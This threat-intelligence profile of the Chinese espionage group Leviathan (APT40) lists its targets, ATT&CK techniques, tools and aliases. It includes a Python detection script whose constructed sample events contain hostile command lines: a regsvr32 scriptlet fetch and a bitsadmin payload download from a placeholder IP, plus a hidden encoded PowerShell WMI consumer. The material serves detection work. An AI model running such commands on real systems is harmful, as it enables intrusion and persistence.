Introduction
Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: CISA Leviathan 2024)
Activities and Tactics
Targeted Sectors: Maritime, Government, Defense, Private sector
Country of Origin: China
Risk Level: High
First Seen: 2013 (this profile's dataset; the cited reporting above dates activity to at least 2009)
Last Activity: 2024
Incident Type: Espionage
Suspected Victims: United States, Hong Kong, the Philippines, Asia Pacific Economic Cooperation, Cambodia, Belgium, Germany, Malaysia, Norway…
Notable Campaigns
- Leviathan Australian Intrusions (C0049): Leviathan Australian Intrusions consisted of at least two long-term intrusions against victims in Australia by Leviathan, relying on similar tradecraft such as external service exploitation followed by extensive credential capture and re-use to enable privilege escalation and lateral movement. Leviathan Australian Intrusions were focused on exfiltrating sensitive data including valid credentials for the victim organizations.(Citation: CISA Leviathan 2024)
Tactics, Techniques, and Procedures (TTPs)
- T1567.002 Exfiltration to Cloud Storage
- T1595.002 Vulnerability Scanning
- T1102.003 One-Way Communication
- T1047 Windows Management Instrumentation
- T1021.004 SSH
- T1105 Ingress Tool Transfer
- T1547.001 Registry Run Keys / Startup Folder
- T1027.013 Encrypted/Encoded File
- T1589.001 Credentials
- T1003.001 LSASS Memory
- T1586.001 Social Media Accounts
- T1090.003 Multi-hop Proxy
- T1027.001 Binary Padding
- T1583.001 Domains
- T1585.002 Email Accounts
- T1566.002 Spearphishing Link
- T1189 Drive-by Compromise
- T1546.003 Windows Management Instrumentation Event Subscription
- T1027.003 Steganography
- T1585.001 Social Media Accounts
- T1059.001 PowerShell
- T1547.009 Shortcut Modification
- T1055.001 Dynamic-link Library Injection
- T1566.001 Spearphishing Attachment
- T1584.004 Server
- T1203 Exploitation for Client Execution
- T1059.005 Visual Basic
- T1078 Valid Accounts
- T1553.002 Code Signing
- T1559.002 Dynamic Data Exchange
- T1587.004 Exploits
- T1197 BITS Jobs
- T1074.001 Local Data Staging
- T1204.002 Malicious File
- T1140 Deobfuscate/Decode Files or Information
- T1074.002 Remote Data Staging
- T1534 Internal Spearphishing
- T1190 Exploit Public-Facing Application
- T1218.010 Regsvr32
- T1041 Exfiltration Over C2 Channel
- T1505.003 Web Shell
- T1021.001 Remote Desktop Protocol
- T1584.008 Network Devices
- T1027.015 Compression
- T1560 Archive Collected Data
- T1572 Protocol Tunneling
- T1204.001 Malicious Link
- T1133 External Remote Services
- T1003 OS Credential Dumping
- T1586.002 Email Accounts
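Several of the techniques listed above leave distinctive host telemetry. As an added example that is not part of this profile or of any cited report, the following Python triage pass encodes one detection for each of seven of them (T1218.010, T1003.001, T1546.003, T1197, T1547.001, T1505.003, T1047) and runs it over constructed Sysmon-style JSON-lines events. The sample records, the LSASS allowlist, the keyword lists and the summary format are all assumptions made for illustration; tune them to your own baseline before using the rules for real.

```python
import json

# Constructed sample events in a Sysmon-like JSON-lines shape (EventID 1 process
# creation, 10 process access, 13 registry value set, 20 WMI consumer). These are
# illustrative records written for this example, not telemetry from any intrusion.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\regsvr32.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "regsvr32 /s /n /u /i:http://203.0.113.5/a.sct scrobj.dll"}
{"EventID": 10, "SourceImage": "C:\\Users\\Public\\wce.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 20, "Name": "Updater", "Type": "Command Line", "Destination": "powershell -nop -w hidden -enc SQBFAFgA"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\bitsadmin.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "bitsadmin /transfer upd /download /priority high http://203.0.113.5/x.exe C:\\Users\\Public\\x.exe"}
{"EventID": 13, "Image": "C:\\Users\\Public\\x.exe", "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "Details": "C:\\Users\\Public\\x.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "CommandLine": "cmd /c whoami"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "CommandLine": "powershell -nop -c whoami"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\svchost.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "svchost.exe -k netsvcs"}
"""

# Processes assumed to legitimately read LSASS memory in this example's environment.
# The allowlist is an assumption for illustration, not a vetted baseline.
LSASS_ALLOW = {"csrss.exe", "wininit.exe", "lsass.exe", "msmpeng.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _basename(path):
    """Lower-cased file name of a Windows path ('' if the field is missing)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def regsvr32_scriptlet(ev):
    """T1218.010: regsvr32 loading a scriptlet (scrobj.dll) or fetching one over HTTP."""
    cl = ev.get("CommandLine", "").lower()
    return (ev.get("EventID") == 1 and _basename(ev.get("Image", "")) == "regsvr32.exe"
            and ("scrobj" in cl or "/i:http" in cl))


def lsass_read(ev):
    """T1003.001: a non-allowlisted process opens lsass.exe with PROCESS_VM_READ (0x10)."""
    if ev.get("EventID") != 10 or _basename(ev.get("TargetImage", "")) != "lsass.exe":
        return False
    access = int(ev.get("GrantedAccess", "0x0"), 16)
    return bool(access & 0x10) and _basename(ev.get("SourceImage", "")) not in LSASS_ALLOW


def wmi_consumer(ev):
    """T1546.003: a WMI event consumer that runs a command line or script (Sysmon EventID 20)."""
    return ev.get("EventID") == 20 and ev.get("Type") in {"Command Line", "Active Script"}


def bits_transfer(ev):
    """T1197: bitsadmin used to download or queue a file transfer."""
    cl = ev.get("CommandLine", "").lower()
    return (ev.get("EventID") == 1 and _basename(ev.get("Image", "")) == "bitsadmin.exe"
            and any(k in cl for k in ("/transfer", "/addfile", "/download")))


def run_key_set(ev):
    """T1547.001: a value written under a CurrentVersion\\Run key (Sysmon EventID 13)."""
    return ev.get("EventID") == 13 and "\\currentversion\\run" in ev.get("TargetObject", "").lower()


def webshell_child(ev):
    """T1505.003: the IIS worker process (w3wp.exe) spawning an interactive shell."""
    return (ev.get("EventID") == 1 and _basename(ev.get("ParentImage", "")) == "w3wp.exe"
            and _basename(ev.get("Image", "")) in SHELLS)


def wmi_spawned_shell(ev):
    """T1047: WmiPrvSE.exe spawning a shell, as seen with remote WMI command execution."""
    return (ev.get("EventID") == 1 and _basename(ev.get("ParentImage", "")) == "wmiprvse.exe"
            and _basename(ev.get("Image", "")) in SHELLS)


# Technique IDs and names as they appear in the TTP list above.
RULES = [
    ("T1218.010", "Regsvr32", regsvr32_scriptlet),
    ("T1003.001", "LSASS Memory", lsass_read),
    ("T1546.003", "WMI Event Subscription", wmi_consumer),
    ("T1197", "BITS Jobs", bits_transfer),
    ("T1547.001", "Registry Run Keys / Startup Folder", run_key_set),
    ("T1505.003", "Web Shell", webshell_child),
    ("T1047", "Windows Management Instrumentation", wmi_spawned_shell),
]


def triage(jsonl):
    """Return one hit per (event, rule) match, tagged with the ATT&CK technique ID."""
    hits = []
    for line in jsonl.strip().splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        subject = ev.get("Image") or ev.get("SourceImage") or ev.get("Name") or "?"
        for tid, name, rule in RULES:
            if rule(ev):
                hits.append({"technique": tid, "name": name,
                             "event": f"EventID {ev['EventID']}: {subject}"})
    return hits


if __name__ == "__main__":
    for h in triage(SAMPLE_EVENTS):
        print(f"{h['technique']:<10} {h['name']:<36} {h['event']}")
```

The two benign records (svchost started by services.exe, and csrss.exe opening LSASS with only 0x1000, which lacks the VM_READ bit) are there to show the rules discriminating rather than matching on process names alone; the LSASS rule in particular should key on the access mask plus a maintained allowlist, because security products legitimately open lsass.exe with read access.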
Notable Indicators of Compromise (IOCs)
No atomic indicators are listed in this profile. The APTnotes snapshot indexes 3 public reports that may contain IOCs; see the References section for the cited reports.
Malware and Tools
- UNITEDRAKE
- AIRBREAK
- BADFLICK
- PHOTO
- HOMEFRY
- LUNCHMONEY
- MURKYTOP
- China Chopper
- Beacon (Cobalt Strike)
- BLACKCOFFEE
- CVE-2017-11882 (Microsoft Office Equation Editor vulnerability exploited via weaponized documents; listed here as an exploit used by the group, not a malware family)
- Derusbi
- RoyalRoad RTF Weaponizer
- 8.t exploit document builder
MITRE ATT&CK Software
- Windows Credential Editor (S0005) - tool
- BITSAdmin (S0190) - tool
- HOMEFRY (S0232) - malware
- Derusbi (S0021) - malware
- at (S0110) - tool
- BLACKCOFFEE (S0069) - malware
- BADFLICK (S0642) - malware
- Empire (S0363) - tool
- gh0st RAT (S0032) - malware
- Net (S0039) - tool
- PowerSploit (S0194) - tool
- MURKYTOP (S0233) - malware
- NanHaiShu (S0228) - malware
- Orz (S0229) - malware
- Cobalt Strike (S0154) - tool
- China Chopper (S0020) - malware
- Tor (S0183) - tool
Attribution and Evidence
Country of Origin: China
Attributed to the Ministry of State Security's Hainan State Security Department and an affiliated front company (Citation: CISA AA21-200A APT40 July 2021). Overlapping vendor names for the same activity, per the cited reports, include APT40, TEMP.Periscope, MUDCARP, KRYPTONITE PANDA, GADOLINIUM, and BRONZE MOHAWK.
References
[1] mitre-attack. MITRE ATT&CK group entry for Leviathan.
[10] Accenture MUDCARP March 2019. Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.
[11] Crowdstrike KRYPTONITE PANDA August 2018. Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021.
[12] Proofpoint Leviathan Oct 2017. Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
[13] MSTIC GADOLINIUM September 2020. Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021.
[14] CISA Leviathan 2024. CISA et al. (2024, July 8). People's Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action. Retrieved February 3, 2025.
[15] CISA AA21-200A APT40 July 2021. CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory - Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China's MSS Hainan State Security Department. Retrieved August 12, 2021.
[17] FireEye Periscope March 2018. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
[18] Microsoft Threat Actor Naming July 2023. Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
[19] FireEye APT40 March 2019. Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.
[20] SecureWorks BRONZE MOHAWK n.d. SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021.